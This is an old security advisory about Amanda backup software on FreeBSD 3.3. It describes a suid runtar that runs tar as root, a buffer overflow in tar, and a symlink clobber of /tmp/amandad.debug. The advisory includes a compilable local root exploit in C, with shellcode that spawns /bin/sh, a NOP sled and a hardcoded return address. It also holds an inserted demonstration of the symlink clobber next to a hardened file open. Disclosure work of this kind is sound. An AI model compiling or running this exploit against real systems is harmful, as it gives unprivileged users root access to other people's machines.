COMMAND
Amanda
SYSTEMS AFFECTED
multiple platforms... (FreeBSD, BSDi, etc)
PROBLEM
Brock Tellier found the following. The Amanda backup package has
several vulnerabilities which allow any user to gain root
privs. Brock's tests were done ONLY on FreeBSD 3.3-RELEASE,
though this is almost certainly not the only vulnerable OS. A
search for "amanda-2 and not freebsd" on AltaVista yields
preliminary, unconfirmed data that some of the vulnerable OS's
(based on packages that are included on install CDs; anyone can
install Amanda to make themselves vulnerable) may be: RedHat
?.?, TurboLinux, PowerTools CD, SuSE 6.2. Confirmation on which
OS's/tar's are vulnerable would be useful.
Amanda's "runtar" program, suid root by default on FreeBSD 3.3,
calls /usr/bin/tar and passes all args given to runtar to this
program. Tar is thus run with root permissions and is vulnerable
to all of the same attacks on suid programs that it would have if
it were suid itself.
Vuln #1 - run tar as root
=========================
Since tar is run with root permissions, you are free to tar up any
file you wish, including /etc/master.passwd. You may also untar
any file you wish, to any location on the system, including
/etc/master.passwd. This does not require any exploit kung-fu
and may be done by supplying args to tar/runtar as if you were
root.
Vuln #1.1 - tar contains a buffer overflow
==========================================
Obtaining root via buffer overflow here is redundant, of course,
but it illustrates the point that even if tar's capabilities
weren't able to gain root privs, the buffer overflow would still
allow you to do so. An overflow exists *IN TAR* which will allow
any user to execute commands as root. Note that an overflow in
tar isn't an immediate security flaw since it is never suid/sgid,
but it goes to show that one should do security audits of all the
programs one calls with user input. By passing a long string to
runtar in the form
/usr/local/libexec/amanda/runtar cvf $400bytes:bah
we can execute our commands. FreeBSD exploit attached below.
Vuln #2 - symlink problem
==========================
Not quite as serious, but a concern nonetheless. When the amandad
daemon is run, it creates a bin-owned file called "amandad.debug"
in /tmp. By creating a symlink from /tmp/amandad.debug to any other
file, we will force amandad to clobber the contents of that file
with amandad's debug info. Note that amandad is not suid/sgid, but
it is often run with root perms at startup or via scripts.
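To show what the clobber in Vuln #2 looks like and how a daemon avoids it, here is an added example (not Amanda's code and not from the advisory): the truncating open-by-name pattern beside a hardened open that refuses to follow a symlink or reuse an existing file, both run against a victim file in a private temp directory rather than /tmp/amandad.debug itself.

```c
/* Added example, not Amanda's or the advisory's code: Vuln #2's symlink
 * clobber reproduced in a private dir, beside the hardened open(). */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* The risky pattern: a truncating open by fixed name. If an attacker has
 * planted a symlink at that name, the file it points to is clobbered. */
int open_debug_unsafe(const char *path) {
    FILE *fp = fopen(path, "w");
    if (!fp) return -1;
    fputs("amandad: debug output\n", fp);
    return fclose(fp);
}

/* Hardened: create a brand-new regular file only (O_EXCL), never follow a
 * symlink (O_NOFOLLOW), private mode. Returns -1 if anything sits there. */
int open_debug_safe(const char *path) {
    const char *msg = "amandad: debug output\n";
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    ssize_t n = write(fd, msg, strlen(msg));
    close(fd);
    return n == (ssize_t)strlen(msg) ? 0 : -1;
}

static long file_size(const char *path) {
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : -1;
}

/* Scenario: in a fresh temp dir a "victim" file holds data and a symlink
 * named amandad.debug points at it. Returns 1 if the opener clobbered the
 * victim, 0 if it survived, -1 on setup failure. */
int victim_clobbered(int (*opener)(const char *)) {
    char dir[] = "/tmp/symlinkdemoXXXXXX", victim[64], link[64];
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/amandad.debug", dir);
    FILE *fp = fopen(victim, "w");
    if (!fp || fputs("important contents\n", fp) < 0 || fclose(fp)) return -1;
    long before = file_size(victim);
    if (symlink(victim, link) != 0) return -1;
    opener(link);                      /* return value irrelevant here */
    return file_size(victim) != before;
}
```

The unsafe opener writes through the symlink and changes the victim's size; the hardened one fails with EEXIST and leaves it untouched.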
Anyone running a suid version of runtar should be suspicious.
Brock did not test any other OS's except FreeBSD 3.3, which
includes amanda 2.3.0 and 2.4.1 as "additional packages" on the
install CD, together with tar-1.11.2.
Exploit:
/*
 * Amanda runtar exploit yields euid=0(root)
 * Actually overflows tar 1.11.2 (included in FreeBSD 3.3)
 * Tested on FreeBSD 3.3, modify shell/addr/dir for Amanda/tar on other
 * platforms
 *
 * Compile gcc -o amandax amandax.c
 * Run ./amandax <offset> <buflen>
 * keep buflen around 400, try positive and negative offsets
 *
 * Brock Tellier btellier@usa.net
 */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>   /* execl */
char fbsdshell[]= /* mudge@lopht.com */
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
#define LEN 400
#define NOP 0x90
#define ALIGN 3
#define OFFSET 0
#define ADDR 0xbfbfdd90 /* fbsd 3.3 */
int main(int argc, char *argv[]) {
    long int offset=OFFSET;
    int i;
    int buflen = LEN;
    long int addr = ADDR;
    char buf[LEN+1];                /* +1 so the argument is NUL-terminated */
    if (argc > 1) offset = atoi(argv[1]);
    if (argc > 2) buflen = atoi(argv[2]);
    if (argc > 3) {
        fprintf(stderr, "Usage: %s <offset> <buflen>\n", argv[0]);
        exit(0);
    }
    if (buflen > LEN) buflen = LEN; /* stay inside buf */
    fprintf(stderr, "Amanda runtar exploit for FreeBSD 3.3\n");
    fprintf(stderr, "Brock Tellier btellier@usa.net\n");
    fprintf(stderr, "Using addr: 0x%lx\t buflen: %d\t offset: %ld\n",
            addr+offset, buflen, offset);
    /* NOP sled, shellcode at +100, then the return address repeated */
    memset(buf,NOP,buflen);
    memcpy(buf+100,fbsdshell,strlen(fbsdshell));
    for(i= 100 + strlen(fbsdshell)+ALIGN;i<buflen-4;i+=4)
        *(int *)&buf[i]=addr+offset;
    buf[buflen] = '\0';
    execl("/usr/local/libexec/amanda/runtar", "runtar","cvf", buf, ":bah",
          NULL);
    exit(0);
}
SOLUTION
If your Amanda is properly installed, then it runs as the user
amanda, bin, or operator, none of which should be accessible to a
regular user. If this account is compromised, then security is
irrelevant, because amanda needs to be able to read the raw disk
files (to do backups) and thus would be able to get /etc/shadow
(or the local equivalent) without much work.
Amanda underwent a major security audit before release 2.4.0
final (the latest stable release is 2.4.1p1), in which a couple
of security problems were fixed, and a lot of security-problem-prone
constructs were reworked to avoid buffer overflows and such.